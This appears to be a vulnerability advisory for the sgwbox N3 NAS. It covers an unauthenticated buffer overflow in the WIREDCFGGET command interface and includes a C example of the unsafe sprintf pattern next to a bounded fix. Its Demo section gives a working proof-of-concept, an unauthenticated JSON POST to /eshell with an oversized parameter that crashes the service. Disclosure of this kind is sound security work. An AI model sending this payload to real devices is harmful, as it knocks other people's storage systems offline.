Information

Vendor: sgwbox

Affected products: N3 NAS ≤ V2.0.25

Vendor Homepage: https://mall.sgwbox.com/

Vendor contact information: mailto:box@new1cloud.com

Description

An unauthenticated buffer overflow vulnerability exists in the sgwbox N3 NAS. It stems from the lack of length validation and limits on fields passed to the WIREDCFGGET command interface. An unauthenticated remote attacker could exploit this vulnerability to crash the service on the target NAS device, resulting in a remote denial of service.

Details

Analysis of the /usr/sbin/http_eshell_server file shows that the WIREDCFGGET command interface performs no authentication or verification, and that the first parameter of the retrieved params is concatenated using sprintf without any length validation.

Therefore, an unauthenticated buffer overflow vulnerability exists here. An unauthenticated attacker could exploit it to crash the remote target NAS device, achieving a remote denial of service.
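The unbounded sprintf pattern described above, next to a bounded replacement. This is an added example, not code recovered from the firmware: the function names, the format string, both size constants and the sample value "eth0" are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

#define CMD_BUF_SIZE 128  /* assumed; the real buffer size is not stated */
#define PARAM_MAX    32   /* assumed upper bound for params[0] */

/* Unbounded pattern: writes past `out` once param0 is long enough. */
void build_cmd_unsafe(char *out, const char *param0)
{
    sprintf(out, "wiredcfg get %s", param0);  /* hypothetical format string */
}

/* Bounded variant. Returns 0 on success, -1 when the request must be rejected. */
int build_cmd_checked(char *out, size_t out_len, const char *param0)
{
    size_t n = 0;
    int written;

    if (out == NULL || out_len == 0 || param0 == NULL)
        return -1;
    out[0] = '\0';
    /* Bounded length scan: never reads more than PARAM_MAX + 1 bytes. */
    while (n <= PARAM_MAX && param0[n] != '\0')
        n++;
    if (n == 0 || n > PARAM_MAX)
        return -1;
    written = snprintf(out, out_len, "wiredcfg get %s", param0);
    if (written < 0 || (size_t)written >= out_len) {
        out[0] = '\0';  /* output would have been truncated: reject */
        return -1;
    }
    return 0;
}

int main(void)
{
    char cmd[CMD_BUF_SIZE];
    char oversized[1025];

    memset(oversized, 'a', sizeof oversized - 1);  /* constructed test input */
    oversized[sizeof oversized - 1] = '\0';
    printf("eth0      -> %d\n", build_cmd_checked(cmd, sizeof cmd, "eth0"));
    printf("oversized -> %d\n", build_cmd_checked(cmd, sizeof cmd, oversized));
    return 0;
}
```

The bounded variant addresses only the missing length check; the missing authentication on the command interface is a separate defect.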

Demo

Without authentication, an attacker sends a POST request message in JSON format to the /eshell API interface without any token information. The request targets the WIREDCFGGET command interface and carries an excessively long string as the first parameter of params.

{
  "params": [
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
  ],
  "cmd": "WIREDCFGGET"
}

Ultimately, the http_eshell_server service on the remote target NAS device crashes, resulting in a remote denial of service.

Credit